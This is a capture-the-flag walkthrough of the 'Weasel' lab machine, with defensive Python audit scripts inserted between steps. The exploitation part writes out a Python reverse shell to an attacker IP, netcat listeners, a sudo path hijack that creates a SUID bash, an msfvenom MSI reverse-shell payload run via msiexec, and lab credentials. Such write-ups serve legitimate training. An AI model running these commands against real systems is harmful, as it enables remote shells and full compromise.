Weasel

Operating system | Difficulty | Release date | Creator |
---|---|---|---|
Windows | Medium | 19 May 2023 | tryhackme & huskyhacks |
Reconnaissance
We send an ICMP probe to the target machine to confirm that we have connectivity.
Initial enumeration
We run an nmap scan to discover which TCP ports are open on the victim machine.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.93.174
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 11:12 -03
Initiating SYN Stealth Scan at 11:12
Scanning 10.10.93.174 [65535 ports]
Discovered open port 22/tcp on 10.10.93.174
Discovered open port 445/tcp on 10.10.93.174
Discovered open port 3389/tcp on 10.10.93.174
Discovered open port 135/tcp on 10.10.93.174
Discovered open port 139/tcp on 10.10.93.174
Discovered open port 8888/tcp on 10.10.93.174
Discovered open port 5985/tcp on 10.10.93.174
Discovered open port 49672/tcp on 10.10.93.174
Discovered open port 47001/tcp on 10.10.93.174
Discovered open port 49664/tcp on 10.10.93.174
Discovered open port 49669/tcp on 10.10.93.174
Discovered open port 49667/tcp on 10.10.93.174
Discovered open port 49668/tcp on 10.10.93.174
Discovered open port 49670/tcp on 10.10.93.174
Discovered open port 49665/tcp on 10.10.93.174
Completed SYN Stealth Scan at 11:13, 19.50s elapsed (65535 total ports)
Nmap scan report for 10.10.93.174
Host is up, received user-set (0.23s latency).
Scanned at 2025-03-27 11:12:55 -03 for 20s
Not shown: 65376 closed tcp ports (reset), 144 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
8888/tcp open sun-answerbook syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds
Raw packets sent: 93235 (4.102MB) | Rcvd: 70065 (2.803MB)
We run nmap's basic enumeration scripts to identify the service and version running on each port.
nmap -sCV -p22,135,139,445,3389,5985,8888,47001,49664,49665,49667,49668,49669,49670,49672 -oN servicesScan 10.10.93.174
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 11:13 -03
Nmap scan report for 10.10.93.174 (10.10.93.174)
Host is up (0.33s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
|_ 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-27T14:16:54+00:00; +2m07s from scanner time.
| rdp-ntlm-info:
| Target_Name: DEV-DATASCI-JUP
| NetBIOS_Domain_Name: DEV-DATASCI-JUP
| NetBIOS_Computer_Name: DEV-DATASCI-JUP
| DNS_Domain_Name: DEV-DATASCI-JUP
| DNS_Computer_Name: DEV-DATASCI-JUP
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-27T14:16:47+00:00
| ssl-cert: Subject: commonName=DEV-DATASCI-JUP
| Not valid before: 2025-03-26T14:00:55
|_Not valid after: 2025-09-25T14:00:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open http Tornado httpd 6.0.3
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
|_http-server-header: TornadoServer/6.0.3
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m07s, deviation: 0s, median: 2m06s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-27T14:16:45
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.44 seconds
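The service scan above is what an asset owner would triage: exposed management services, an interactive notebook server behind a login page, and SMB signing that is enabled but not required. The following Python script is an added example (not part of the original writeup) that parses nmap's normal output into port records and turns it into exposure findings; the excerpt it parses is trimmed from the scan shown above, and the list of ports treated as management-only is an assumed baseline, not something the page states.

```python
import re

# Trimmed excerpt of the service scan above (taken from the page's own output);
# a full -sCV report parses the same way.
SCAN_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Product_Version: 10.0.17763
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8888/tcp open http Tornado httpd 6.0.3
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
49664/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
"""

# One port line: "<port>/<proto> <state> <service> [version text]"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_scan(text):
    """Parse nmap normal output into port records plus host-level script lines."""
    ports, host_scripts = [], []
    current, in_host_scripts = None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": m.group("version").strip(),
                "scripts": [],  # NSE output lines attached to this port
            }
            ports.append(current)
            in_host_scripts = False
        elif line.startswith("Host script results"):
            in_host_scripts, current = True, None
        elif line.startswith("|"):
            # Strip the "| " / "|_ " prefixes nmap puts on script output
            body = line.lstrip("|_ ").strip()
            if in_host_scripts:
                host_scripts.append(body)
            elif current is not None:
                current["scripts"].append(body)
    return {"ports": ports, "host_scripts": host_scripts}


# Exposure baseline (assumption: services that should only be reachable from a
# management network; this is not a policy the page states).
RISKY_PORTS = {135: "MSRPC", 139: "NetBIOS", 445: "SMB", 3389: "RDP", 5985: "WinRM"}


def review(text):
    """Turn the parsed scan into a list of findings for the asset owner."""
    report = parse_scan(text)
    findings = []
    for p in report["ports"]:
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']}"
        if p["port"] in RISKY_PORTS:
            findings.append(f"{tag}: {RISKY_PORTS[p['port']]} reachable; restrict to management networks")
        if any("Jupyter" in s for s in p["scripts"]):
            findings.append(f"{tag}: Jupyter Notebook reachable; require token or password auth and bind it to localhost")
    if any("signing enabled but not required" in s for s in report["host_scripts"]):
        findings.append("445/tcp: SMB signing not required; enforce it via policy")
    return findings


if __name__ == "__main__":
    for finding in review(SCAN_OUTPUT):
        print(finding)
```

Run against the excerpt it reports five management services, the notebook server and the SMB signing weakness; feeding it the full output of the scan above produces the same findings because the remaining ports are RPC endpoints outside the baseline.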
Initial exploitation
HTTP (8888) - Jupyter Notebook
Jupyter Notebook is a ==web application for creating and sharing documents that contain code, text, equations and visualizations==. It is an open-source tool used to:
- Develop, document and present projects
- Visualize data in data science and big data work
- Run numerical simulations
- Prepare and present data
Jupyter Notebook is very popular among data scientists, analysts and developers.
Samba (445)
We list the shared resources.
We use the token to log in.
067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a
import socket,os,pty;s=socket.socket();s.connect(("10.9.2.3", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
We start a Netcat listener.
rlwrap nc -lnvp 4444
We run the code.
We escalate privileges
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'> /home/dev-datasci/.local/bin/jupyter
chmod +x /home/dev-datasci/.local/bin/jupyter
sudo /home/dev-datasci/.local/bin/jupyter
cd /tmp
./bash -p
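The escalation above works because sudo grants root to a command whose path lives under a user-controlled home directory, so the file can be replaced before it is run. As an added example (not from the writeup), the Python script below audits sudoers rules and flags any allowed command whose path, or any parent directory, is owned by a non-root user or is group/world writable. The sudoers line and the file ownership table are constructed to mirror this scenario; the real rule on the box is not shown on the page and is only assumed to look like this.

```python
import os
import re

# Constructed sudoers content (assumption: the shape of a rule granting root to a
# script under a user's home; not the machine's actual sudoers).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
dev-datasci-lowpriv ALL=(ALL) NOPASSWD: /home/dev-datasci/.local/bin/jupyter
backup ALL=(root) /usr/bin/rsync
"""

# Constructed (owner, mode) metadata for every path component the audit walks;
# on a live host this would come from os.stat().
SAMPLE_FS = {
    "/": ("root", 0o755),
    "/home": ("root", 0o755),
    "/home/dev-datasci": ("dev-datasci", 0o750),
    "/home/dev-datasci/.local": ("dev-datasci", 0o755),
    "/home/dev-datasci/.local/bin": ("dev-datasci", 0o755),
    "/home/dev-datasci/.local/bin/jupyter": ("dev-datasci", 0o755),
    "/usr": ("root", 0o755),
    "/usr/bin": ("root", 0o755),
    "/usr/bin/rsync": ("root", 0o755),
}

# Simplified user specification: "user host=(runas) [TAG:] cmd[, cmd...]"
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?"
    r"\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Return the user-specification rules found in sudoers text."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "user": m.group("user"),
            "runas": m.group("runas") or "root",
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def path_components(path):
    """Yield the path and each of its parents, leaf first, up to '/'."""
    p = os.path.normpath(path)
    while True:
        yield p
        parent = os.path.dirname(p)
        if parent == p:
            return
        p = parent


def weak_components(path, fs):
    """Components a non-root user could modify (or whose metadata is unknown)."""
    weak = []
    for comp in path_components(path):
        meta = fs.get(comp)
        if meta is None:
            weak.append((comp, "unknown metadata"))
            continue
        owner, mode = meta
        if owner != "root":
            weak.append((comp, f"owned by {owner}"))
        elif mode & 0o022:  # group or world writable
            weak.append((comp, f"group/world writable ({oct(mode)})"))
    return weak


def audit(text, fs):
    """List sudo rules whose command path can be tampered with by a non-root user."""
    findings = []
    for rule in parse_rules(text):
        for cmd in rule["cmds"]:
            exe = cmd.split()[0]
            if exe == "ALL":
                continue  # unrestricted rules are a separate policy question
            weak = weak_components(exe, fs)
            if weak:
                findings.append({"user": rule["user"], "cmd": exe,
                                 "nopasswd": rule["nopasswd"], "weak": weak})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS, SAMPLE_FS):
        print(f"{f['user']} -> {f['cmd']} (NOPASSWD={f['nopasswd']})")
        for comp, why in f["weak"]:
            print(f"    {comp}: {why}")
```

The rsync rule passes because every component from `/` down is root-owned and not group/world writable; the jupyter rule is flagged four times, once for the script and once for each directory under the user's home. The fix is to grant sudo only to binaries under root-owned paths such as `/usr/bin`.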
Privilege escalation
From the home directory of the user dev-datasci we obtain their SSH key.
ssh -i weasel_id_ssh dev-datasci-lowpriv@10.10.93.174
dev-datasci-lowpriv:wUqnKWqzha*W!PWrPRWi!M8faUn
AlwaysInstallElevated
The Always Install Elevated policy is a Windows setting that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation started by a standard user runs with administrative rights, bypassing User Account Control (UAC) prompts.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
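The writeup queries the HKCU key only; the policy is actually enforced by Windows Installer only when `AlwaysInstallElevated` is set to 1 under both `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and `HKCU\Software\Policies\Microsoft\Windows\Installer`, so an audit has to read both. The Python below is an added example (not the page's code) that parses the text `reg query` prints for each hive and reports whether the policy is effectively on. The registry output it consumes is constructed sample data, and the only registry value names used are the ones on the page.

```python
import re

# Constructed `reg query` output (assumption: mirrors the layout reg.exe prints;
# the values are sample data, not what the target machine returned).
HKLM_ENABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_ENABLED = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_DISABLED = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
# What reg.exe prints when the key does not exist at all
KEY_MISSING = "ERROR: The system was unable to find the specified registry key or value."

# One value line: "    <name>    <REG_TYPE>    <data>"
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")


def parse_reg_query(text):
    """Map each key path in reg query output to its {name: (type, data)} values."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            data = m.group("data").strip()
            if m.group("type") == "REG_DWORD":
                data = int(data, 16)  # reg.exe prints DWORDs as 0x... hex
            keys[current][m.group("name")] = (m.group("type"), data)
    return keys


def dword(keys, name):
    """Return the DWORD value `name` from the first key that has it, else 0 (unset)."""
    for values in keys.values():
        if name in values and values[name][0] == "REG_DWORD":
            return values[name][1]
    return 0


def always_install_elevated(hklm_text, hkcu_text):
    """Evaluate the policy from the reg query output of both hives.

    Windows Installer honours AlwaysInstallElevated only when the value is 1 in
    both HKLM and HKCU; a missing key or a 0 in either hive disables it.
    """
    hklm = dword(parse_reg_query(hklm_text), "AlwaysInstallElevated")
    hkcu = dword(parse_reg_query(hkcu_text), "AlwaysInstallElevated")
    return {"hklm": hklm, "hkcu": hkcu, "effective": hklm == 1 and hkcu == 1}


if __name__ == "__main__":
    for label, hkcu in (("both set", HKCU_ENABLED), ("HKCU 0", HKCU_DISABLED), ("HKCU missing", KEY_MISSING)):
        print(label, always_install_elevated(HKLM_ENABLED, hkcu))
```

On a real host the two inputs are the outputs of `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and the HKCU query shown above. Remediation is to set the value to 0 (or delete it) in both hives, normally through the "Always install with elevated privileges" Group Policy setting rather than by editing the registry directly.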
We create a payload with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.2.3 LPORT=443 -a x64 --platform Windows -f msi -o shell.msi
We transfer it to the victim machine.
We start a Netcat listener on port 443.
rlwrap nc -lnvp 443
We run the following command:
runas /user:dev-datasci-lowpriv "cmd /c msiexec /i C:\Users\dev-datasci-lowpriv\Desktop\shell.msi /quiet /qn /norestart"
Post-exploitation
We read the root.txt flag.